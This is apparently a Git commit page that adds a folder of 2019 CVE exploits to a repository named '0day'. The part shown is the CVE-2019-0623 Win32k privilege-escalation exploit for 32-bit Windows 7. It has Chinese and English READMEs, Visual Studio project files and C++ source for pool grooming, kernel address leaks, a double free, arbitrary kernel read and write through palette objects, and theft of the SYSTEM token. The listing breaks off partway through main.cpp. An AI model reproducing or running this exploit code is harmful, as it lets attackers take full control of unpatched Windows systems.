admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add several 2019 cve

Browse Source
This commit is contained in:
helloexp 2022-03-01 16:58:42 +08:00
parent e91fbcdf96
commit 24160bc81c
56 changed files with 4712 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
00-CVE_EXP/CVE-2019-0623/CVE-2019-0623.exe Normal file
View File

Binary file not shown.

52
00-CVE_EXP/CVE-2019-0623/README.md Normal file
View File

@ -0,0 +1,52 @@
### CVE-2019-0623
#### 描述
Win32k特权提升漏洞
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | |
| Windows 10 | x64/x86 | 1703 | | |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows 7 | x64/x86 | | SP1 | ✔ |
| Windows Server 2016 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server | | 1803 | | |
| Windows Server | | 1709 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0623
```
#### 利用方式
编译环境
- VS2019V142X86 Debug
改POC只对x86的机器有效测试机器为Windows 7 SP1 x86
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif)
#### 分析文章
- https://paper.seebug.org/832/
#### 代码来源
- [DreamoneOnly](https://github.com/DreamoneOnly/CVE-2019-0623-32-exp)

53
00-CVE_EXP/CVE-2019-0623/README_EN.md Normal file
View File

@ -0,0 +1,53 @@
### CVE-2019-0623
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | |
| Windows 10 | x64/x86 | 1703 | | |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows 7 | x64/x86 | | SP1 | ✔ |
| Windows Server 2016 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server | | 1803 | | |
| Windows Server | | 1709 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0623
```
#### Utilization
CompilerEnvironment
- VS2019V142X86 Debug
POC is only valid for the X86 machine, the test machine is Windows 7 SP1 X86
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif)
#### Analyze
- https://paper.seebug.org/832/
#### ProjectSource
- [DreamoneOnly](https://github.com/DreamoneOnly/CVE-2019-0623-32-exp)

33
00-CVE_EXP/CVE-2019-0623/src/CVE-2019-0623.filters Normal file
View File

@ -0,0 +1,33 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="FengShui.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="leak.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="leak.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
</Project>

31
00-CVE_EXP/CVE-2019-0623/src/CVE-2019-0623.sln Normal file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30002.166
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-0623", "CVE-2019-0623.vcxproj", "{F8C67622-75D0-4FB8-8068-8367978E379E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F8C67622-75D0-4FB8-8068-8367978E379E}.Debug|x64.ActiveCfg = Debug|x64
{F8C67622-75D0-4FB8-8068-8367978E379E}.Debug|x64.Build.0 = Debug|x64
{F8C67622-75D0-4FB8-8068-8367978E379E}.Debug|x86.ActiveCfg = Debug|Win32
{F8C67622-75D0-4FB8-8068-8367978E379E}.Debug|x86.Build.0 = Debug|Win32
{F8C67622-75D0-4FB8-8068-8367978E379E}.Release|x64.ActiveCfg = Release|x64
{F8C67622-75D0-4FB8-8068-8367978E379E}.Release|x64.Build.0 = Release|x64
{F8C67622-75D0-4FB8-8068-8367978E379E}.Release|x86.ActiveCfg = Release|Win32
{F8C67622-75D0-4FB8-8068-8367978E379E}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {CC1E7F30-FEA3-45D6-9995-FD51E18B7BC2}
EndGlobalSection
EndGlobal

4
00-CVE_EXP/CVE-2019-0623/src/CVE-2019-0623.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

155
00-CVE_EXP/CVE-2019-0623/src/CVE-2019-0623.vcxproj Normal file
View File

@ -0,0 +1,155 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{F8C67622-75D0-4FB8-8068-8367978E379E}</ProjectGuid>
<RootNamespace>My20188589</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="FengShui.cpp" />
<ClCompile Include="leak.cpp" />
<ClCompile Include="main.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="leak.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

4
00-CVE_EXP/CVE-2019-0623/src/CVE-2019-0623.vcxproj.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

95
00-CVE_EXP/CVE-2019-0623/src/FengShui.cpp Normal file
View File

@ -0,0 +1,95 @@
#include"leak.h"
#include<windows.h>
///////////////////////////////////////////////////////////////////////////////////////////////
//
// allocate session pool by CreatePalette
// pool size >= 0xa0
//
// pool_size = number * 4 + 0x58 + sizeof(_pool_header):{8}
// if (pool_size <= 0xa0)
// pool_size = 0xa0
//
// size must 8 bytes alignment on 32-bit windows
bool session_pool_fill_ge_0xa0(USHORT size, ULONG num, HPALETTE * p_hpalette)
{
bool ret = true;
USHORT tmp_NumEntries = 0x10;
PLOGPALETTE p_logPalette = nullptr;
if (size > 0xa0)
{
tmp_NumEntries += (size - 0xa0) / 4;
}
p_logPalette = static_cast<PLOGPALETTE>(malloc(sizeof(LOGPALETTE) + 4 * tmp_NumEntries));
if (p_logPalette == NULL)
{
ret = false;
goto end;
}
p_logPalette->palVersion = 0x300;
p_logPalette->palNumEntries = tmp_NumEntries;
for (size_t i = 0; i < num; i++)
{
p_hpalette[i] = CreatePalette(p_logPalette);
if (p_hpalette[i] == NULL)
{
ret = false;
break;
}
}
free(p_logPalette);
end:
return ret;
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// allocate session pool by CreateAcceleratorTable
// pool size >= 0x20
//
// pool_size = number * 6 + 0x12 + sizeof(_pool_header):{8}
//
// size must 8 bytes alignment on 32-bit windows
bool session_pool_fill_ge_0x20(USHORT size, ULONG num, HACCEL* p_hAccel)
{
bool ret = true;
USHORT tmp_cAccel = NULL;
LPACCEL p_logAccel = nullptr;
if (size > 0x20)
{
tmp_cAccel += (size - 0x20) / 6;
}
p_logAccel = static_cast<LPACCEL>(malloc(sizeof(LOGPALETTE) * tmp_cAccel));
if (p_logAccel == NULL)
{
ret = false;
goto end;
}
for (size_t i = 0; i < num; i++)
{
p_hAccel[i] = CreateAcceleratorTable(p_logAccel, tmp_cAccel);
if (p_hAccel[i] == NULL)
{
ret = false;
break;
}
}
free(p_logAccel);
end:
return ret;
}

101
00-CVE_EXP/CVE-2019-0623/src/leak.cpp Normal file
View File

@ -0,0 +1,101 @@
#include"leak.h"
leak::leak()
{
GetXXXHmValidateHandle();
GetGdiSharedHandleTable();
Get_gSharedInfo_ulClientDelta();
}
void leak::GetXXXHmValidateHandle()
{
auto hModule = LoadLibrary(L"user32.dll");
auto func = GetProcAddress(hModule, "IsMenu");
for (size_t i = 0; i < 0x1000; i++)
{
BYTE* test = (BYTE*)func + i;
if (*test == 0xE8)
{
#ifdef _AMD64_
ULONG_PTR tmp = (ULONG_PTR)((ULONG_PTR) * (PULONG)(test + 1) | 0xffffffff00000000);
#else
ULONG_PTR tmp = (ULONG_PTR) * (PULONG)(test + 1);
#endif
HmValidateHandle = (_xxxHmValidateHandle)(test + tmp + 5);
break;
}
}
return;
}
void leak::GetGdiSharedHandleTable()
{
PULONG_PTR teb = (PULONG_PTR)NtCurrentTeb();
#ifdef _AMD64_
PULONG_PTR peb = *(PULONG_PTR*)((PBYTE)teb + 0x60);
GdiSharedHandleTable = (pGdiCell) * (PULONG_PTR*)((PBYTE)peb + 0xf8);
#else
PULONG_PTR peb = *(PULONG_PTR*)((PBYTE)teb + 0x30);
GdiSharedHandleTable = (pGdiCell) * (PULONG_PTR*)((PBYTE)peb + 0x94);
#endif
return;
}
void leak::Get_gSharedInfo_ulClientDelta()
{
auto pMenu = CreateMenu();
/* get g_DeltaDesktopHeap */
ULONG_PTR Teb = (ULONG_PTR)NtCurrentTeb();
#ifdef _AMD64_
g_DeltaDesktopHeap = *(ULONG_PTR*)(Teb + 0x800 + 0x28); //teb->Win32ClientInfo.ulClientDelta
#else
g_DeltaDesktopHeap = *(ULONG_PTR*)(Teb + 0x6CC + 0x1C);
#endif
auto hModule = GetModuleHandleW(L"user32.dll");
gSharedInfo = reinterpret_cast<PtagSharedInfo>(GetProcAddress(hModule, "gSharedInfo"));
DestroyMenu(pMenu);
}
PVOID leak::GetGdiKernelAddress(HANDLE hGdi)
{
return (GdiSharedHandleTable + LOWORD(hGdi))->pKernelAddress;
}
PVOID leak::GetUserObjectAddressBygSharedInfo(HANDLE hWnd, PULONG_PTR UserAddr)
{
PVOID ret = nullptr;
pHandleEntry tmp = nullptr;
for (ULONG_PTR i = 0; i < gSharedInfo->psi->cHandleEntries; i++)
{
tmp = gSharedInfo->aheList + i;
HANDLE handle = reinterpret_cast<HANDLE>(tmp->wUniq << 0x10 | i);
if (handle == hWnd)
{
ret = tmp->phead;
if (UserAddr != NULL)
{
*UserAddr = (ULONG_PTR)ret - g_DeltaDesktopHeap;
}
}
}
return ret;
}

114
00-CVE_EXP/CVE-2019-0623/src/leak.h Normal file
View File

@ -0,0 +1,114 @@
#pragma once
#include<windows.h>
/*
Microsoft_Code_Name Windows_10_Version Microsoft_Marketing_Name Release_Date
Threshold 1 (TH1) 1507 ------ July 2015
Threshold 2 (TH2) 1511 ------ November 2015
Redstone 1 (RS1) 1607 Anniversary Update August 2016
Redstone 2 (RS2) 1703 Creators Update April 2017
Redstone 3 (RS3) 1709 Fall Creators Update October 2017
Redstone 4 (RS4) 1803 April 2018 Update April 2018
*/
typedef enum class _HANDLE_TYPE : ULONG_PTR
{
TYPE_FREE = 0,
TYPE_WINDOW = 1,
TYPE_MENU = 2,
TYPE_CURSOR = 3,
TYPE_SETWINDOWPOS = 4,
TYPE_HOOK = 5,
TYPE_CLIPDATA = 6,
TYPE_CALLPROC = 7,
TYPE_ACCELTABLE = 8,
TYPE_DDEACCESS = 9,
TYPE_DDECONV = 10,
TYPE_DDEXACT = 11,
TYPE_MONITOR = 12,
TYPE_KBDLAYOUT = 13,
TYPE_KBDFILE = 14,
TYPE_WINEVENTHOOK = 15,
TYPE_TIMER = 16,
TYPE_INPUTCONTEXT = 17,
TYPE_HIDDATA = 18,
TYPE_DEVICEINFO = 19,
TYPE_TOUCHINPUTINFO = 20,
TYPE_GESTUREINFOOBJ = 21,
TYPE_CTYPES,
TYPE_GENERIC = 255
} HANDLE_TYPE, * PHANDLE_TYPE;
typedef struct _GdiCell
{
PVOID pKernelAddress;
UINT16 wProcessIdl;
UINT16 wCount;
UINT16 wUpper;
UINT16 uType;
PVOID pUserAddress;
}GdiCell, * pGdiCell;
typedef struct _HandleEntry
{
PULONG_PTR phead;
PULONG_PTR pOwner;
BYTE bType;
BYTE bFlalgs;
USHORT wUniq;
}HandleEntry, * pHandleEntry;
typedef struct _tagServerInfo
{
ULONG dwSRVIFlags;
ULONG_PTR cHandleEntries;
//...
}tagServerInfo, * ptagServerInfo;
typedef struct _tagSharedInfo
{
ptagServerInfo psi;
pHandleEntry aheList;
//...
}tagSharedInfo, * PtagSharedInfo;
using _xxxHmValidateHandle = PVOID(__fastcall*)(HANDLE hwnd, ULONG_PTR handleType);
class leak
{
public:
leak();
~leak() {};
PVOID GetGdiKernelAddress(HANDLE hGdi); // RS1之前可用用于GDI Object
PVOID GetUserObjectAddressBygSharedInfo(HANDLE hWnd,PULONG_PTR UserAddr); // RS2之前可用用于User Obejct
_xxxHmValidateHandle HmValidateHandle; // RS4之前可用返回在用户层映射的地址用于User Object可以根据heap->pSelf找到内核地址
ULONG_PTR g_DeltaDesktopHeap;
private:
void GetGdiSharedHandleTable();
void Get_gSharedInfo_ulClientDelta();
void GetXXXHmValidateHandle();
public:
pGdiCell GdiSharedHandleTable;
PtagSharedInfo gSharedInfo;
};

447
00-CVE_EXP/CVE-2019-0623/src/main.cpp Normal file
View File

@ -0,0 +1,447 @@
#include "leak.h"
#include <iostream>
using namespace std;
///////////////////////////////////////////////////////////////////////////////////////////////
//
// variables
//
leak p_leak;
HPALETTE g_hPalettle[0x1000];
ULONG_PTR g_KernelPalettle[0x1000];
ULONG_PTR g_hDC[0x3000];
HPALETTE hManage,hWorker;
ULONG_PTR Manage_index;
PVOID g_PsInitialSystemProcess;
constexpr auto number = 0x500;
HACCEL hAccel[number];
///////////////////////////////////////////////////////////////////////////////////////////////
//
// prototypes
//
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct tagCLSMENUNAME
{
LPSTR pszClientAnsiMenuName;
LPWSTR pwszClientUnicodeMenuName;
PUNICODE_STRING pusMenuName;
} CLSMENUNAME, * PCLSMENUNAME;
typedef NTSTATUS(__stdcall* _ZwQuerySystemInformation)(
_In_ DWORD SystemInformationClass,
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength
);
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
bool session_pool_fill_ge_0xa0(USHORT size, ULONG num, HPALETTE* p_hpalette);
bool session_pool_fill_ge_0x20(USHORT size, ULONG num, HACCEL* p_hAccel);
///////////////////////////////////////////////////////////////////////////////////////////////
//
// Release tagCLS
//
__declspec(naked)
BOOL __stdcall NtUserUnregisterClass(
IN PUNICODE_STRING pstrClassName,
IN HINSTANCE hInstance,
OUT PCLSMENUNAME pcmn)
{
__asm
{
mov eax, 0x1263
mov edx, 0x7FFE0300
call dword ptr[edx]
retn 0x0C
}
}
BOOL ReleaseClass(
_In_ LPCWSTR lpClassName,
_In_opt_ HINSTANCE hInstance
)
{
UNICODE_STRING ClassName = { 0 };
CLSMENUNAME pcmn = { 0 };
ClassName.Buffer = (PWSTR)lpClassName;
ClassName.Length = (USHORT)wcslen(lpClassName);
ClassName.MaximumLength = ClassName.Length;
return NtUserUnregisterClass(&ClassName, hInstance, &pcmn);
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// 第一次占坑
//
__declspec(naked)
void __stdcall NtGdiSetLinkedUFIs(
IN HDC hdc,
IN char* pufiLinks,
IN ULONG uNumUFIs)
{
__asm
{
mov eax, 0x111D
mov edx, 0x7FFE0300
call dword ptr[edx]
retn 0x0C
}
}
void SparyDC()
{
char buf[0x200] = { 0 };
memset(buf, 0xCC, 0x200);
for (ULONG_PTR i = 0; i < 0x1000; i++)
{
//__asm int 3
NtGdiSetLinkedUFIs((HDC)g_hDC[i], buf, 0x13); // a2 = (pool_size - 8) / 8
}
cout << "hdc address:0x" << hex << g_hDC << endl;
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// modify hWorker's pointer
//
void modify_palPoniter()
{
char palette_Manage[0xa0] = { 0 };
*(PULONG_PTR)palette_Manage = (ULONG_PTR)hManage;
*(PULONG_PTR)(palette_Manage + 8) = 0x80000000;
*(PULONG_PTR)(palette_Manage + 0x10) = 0x00000501;
*(PULONG_PTR)(palette_Manage + 0x14) = 0x00000010;
*(PULONG_PTR)(palette_Manage + 0x4C) = g_KernelPalettle[0] + 0x4C;
hWorker = g_hPalettle[0];
for (ULONG_PTR i = 0; i < 0x1000; i++)
{
//__asm int 3
NtGdiSetLinkedUFIs((HDC)g_hDC[i], palette_Manage, 0xA);
}
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// get PsInitialSystemProcess
//
void get_PsInitialSystemProcess()
{
DWORD SysModuleSize;
PVOID NtKernelAddr;
PVOID NtKernelAddr_InUser;
PVOID PsInitialSystemProcess;
char* ImageName;
char NtKernelImageName[256] = { 0 };
PSYSTEM_MODULE_INFORMATION SysModule;
_ZwQuerySystemInformation ZwQuerySystemInformation;
ZwQuerySystemInformation = (_ZwQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwQuerySystemInformation");
ZwQuerySystemInformation(11, NULL, NULL, &SysModuleSize);
SysModule = (PSYSTEM_MODULE_INFORMATION)malloc(SysModuleSize);
ZwQuerySystemInformation(11, SysModule, SysModuleSize, &SysModuleSize);
NtKernelAddr = SysModule->Module[0].Base;
strcpy_s(NtKernelImageName, 256, SysModule->Module[0].ImageName);
ImageName = strrchr(NtKernelImageName, '\\') + 1;
NtKernelAddr_InUser = LoadLibraryA(ImageName);
PsInitialSystemProcess = GetProcAddress((HMODULE)NtKernelAddr_InUser, "PsInitialSystemProcess");
g_PsInitialSystemProcess = (PVOID)((DWORD)PsInitialSystemProcess - (DWORD)NtKernelAddr_InUser + (DWORD)NtKernelAddr);
cout << "PsInitialSystemProcess :0x" << hex << g_PsInitialSystemProcess << endl;
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// arbitrary read && wirute
//
void ar_read(ULONG_PTR addr,PULONG_PTR data)
{
SetPaletteEntries(hManage, 0, 1, (PALETTEENTRY*)&addr);
GetPaletteEntries(hWorker, 0, 1, (PALETTEENTRY*)data);
}
void ar_write(ULONG_PTR addr, PULONG_PTR data)
{
SetPaletteEntries(hManage, 0, 1, (PALETTEENTRY*)&addr);
SetPaletteEntries(hWorker, 0, 1, (PALETTEENTRY*)data);
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// fix dc
//
void fix_dc()
{
ULONG_PTR palette_hendleEntry = (ULONG_PTR)(p_leak.GdiSharedHandleTable + LOWORD(hManage));
ULONG_PTR pte_addr = 0xC0000000 + (palette_hendleEntry >> 12 << 3) ;
ULONG_PTR pte_data;
ar_read(pte_addr, &pte_data);
pte_data = pte_data | 0x2;
ar_write(pte_addr, &pte_data);
for (size_t i = 0; i < 4; i++)
{
*(PULONG_PTR)(palette_hendleEntry + i) = 0x0;
}
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// copy system token
//
constexpr auto ActiveProcessLinks = 0xb8;
constexpr auto Pid = 0xb4;
constexpr auto Token = 0xf8;
void copy_token()
{
ULONG_PTR system_eprocess;
ULONG_PTR current_pid = GetCurrentProcessId();
ULONG_PTR pid;
ULONG_PTR system_token;
ULONG_PTR nextProcess;
get_PsInitialSystemProcess();
ar_read((ULONG_PTR)g_PsInitialSystemProcess, &system_eprocess);
cout << "system_eprocess : 0x" << hex << system_eprocess << endl;
//__asm int 3
//find current process's eprocess
ar_read(system_eprocess + ActiveProcessLinks, &nextProcess);
nextProcess -= ActiveProcessLinks;
do
{
ar_read(nextProcess + Pid, &pid);
if (pid == current_pid)
{
break;
}
ar_read(nextProcess + ActiveProcessLinks, &nextProcess);
nextProcess -= ActiveProcessLinks;
} while (nextProcess != system_eprocess);
cout << "current_eprocess : 0x" << hex << nextProcess << endl;
//copy system token
ar_read(system_eprocess + Token, &system_token);
ar_write(nextProcess + Token, &system_token);
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// double free baseCLS and CloneCLS's lpszMenuName
//
DWORD WINAPI ThreadProc(_In_ LPVOID lpParameter
)
{
ULONG_PTR UserMap;
//触发Clone Class流程
auto hwnd = CreateWindowEx(NULL, L"associated class", NULL, WS_DISABLED, NULL, NULL, 1, 1, NULL, NULL, GetModuleHandle(NULL), NULL);
auto Kernel = p_leak.GetUserObjectAddressBygSharedInfo(hwnd, &UserMap);
cout << "hwnd kernel: 0x" << hex << Kernel << endl;
ULONG_PTR cls = *(PULONG_PTR)(UserMap + 0x64);
